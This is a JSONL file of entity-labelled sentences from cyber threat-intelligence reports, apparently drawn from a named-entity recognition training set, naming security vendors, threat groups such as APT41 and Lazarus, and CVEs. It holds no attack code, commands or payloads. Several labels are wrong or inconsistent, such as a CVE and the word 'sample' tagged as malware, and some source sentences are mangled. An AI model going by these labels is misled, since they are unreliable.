{"text": "Kaspersky have observed similar activity in the past from groups such as Oilrig and Stonedrill , which leads us to believe the new attacks could be connected , though for now that connection is only assessed as low confidence .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: Oilrig": [[73, 79]], "THREAT_ACTOR: Stonedrill": [[84, 94]]}, "info": {"id": "dnrti_train_003623", "source": "dnrti_train"}}
{"text": "In August 2019 , FireEye released the Double Dragon” report on our newest graduated threat group , APT41 .", "spans": {"ORGANIZATION: FireEye": [[17, 24]], "THREAT_ACTOR: APT41": [[99, 104]]}, "info": {"id": "dnrti_train_003624", "source": "dnrti_train"}}
{"text": "Today , FireEye Intelligence is releasing a comprehensive report detailing APT41 , a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations .", "spans": {"ORGANIZATION: FireEye": [[8, 15]], "THREAT_ACTOR: APT41": [[75, 80]]}, "info": {"id": "dnrti_train_003625", "source": "dnrti_train"}}
{"text": "Group-IB experts continuously monitor the Silence’ activities .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "THREAT_ACTOR: Silence’": [[42, 50]]}, "info": {"id": "dnrti_train_003626", "source": "dnrti_train"}}
{"text": "Group-IB has uncovered a hacker group , MoneyTaker , attacking banks in the USA and Russia .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "THREAT_ACTOR: MoneyTaker": [[40, 50]]}, "info": {"id": "dnrti_train_003627", "source": "dnrti_train"}}
{"text": "Group-IB reveals the unknown details of attacks from one of the most notorious APT groups , Lazarus .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "THREAT_ACTOR: Lazarus": [[92, 99]]}, "info": {"id": "dnrti_train_003628", "source": "dnrti_train"}}
{"text": "Finally , Kaspersky produced a summary report on Sofacy’s summertime activity .", "spans": {"ORGANIZATION: Kaspersky": [[10, 19]], "THREAT_ACTOR: Sofacy’s": [[49, 57]]}, "info": {"id": "dnrti_train_003629", "source": "dnrti_train"}}
{"text": "Kaspersky were also able to produce two reports on Korean speaking actors , specifically involving Scarcruft and Bluenoroff .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: Scarcruft": [[99, 108]], "THREAT_ACTOR: Bluenoroff": [[113, 123]]}, "info": {"id": "dnrti_train_003630", "source": "dnrti_train"}}
{"text": "Analysis of the payload allowed us to confidently link this attack to an actor Kaspersky track as BlackOasis .", "spans": {"ORGANIZATION: Kaspersky": [[79, 88]], "THREAT_ACTOR: BlackOasis": [[98, 108]]}, "info": {"id": "dnrti_train_003631", "source": "dnrti_train"}}
{"text": "For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2 This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP port 443 .", "spans": {"THREAT_ACTOR: Bisonal malware": [[14, 29]], "MALWARE: Bisonal": [[98, 105]]}, "info": {"id": "dnrti_train_003835", "source": "dnrti_train"}}
{"text": "We can observe that the sample is very recent , created on Thursday , July 4", "spans": {"MALWARE: sample": [[24, 30]]}, "info": {"id": "dnrti_train_003850", "source": "dnrti_train"}}
{"text": "Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers .", "spans": {"MALWARE: EternalRomance": [[25, 39]], "MALWARE: EternalSynergy": [[53, 67]], "MALWARE: CVE-2017-0143": [[86, 99]]}, "info": {"id": "dnrti_train_003868", "source": "dnrti_train"}}
{"text": "Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT Maudi Surveillance Operation which was previously reported in 2013 .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "VULNERABILITY: CVE-2018-0798": [[54, 67]], "THREAT_ACTOR: Maudi": [[145, 150]]}, "info": {"id": "dnrti_train_004230", "source": "dnrti_train"}}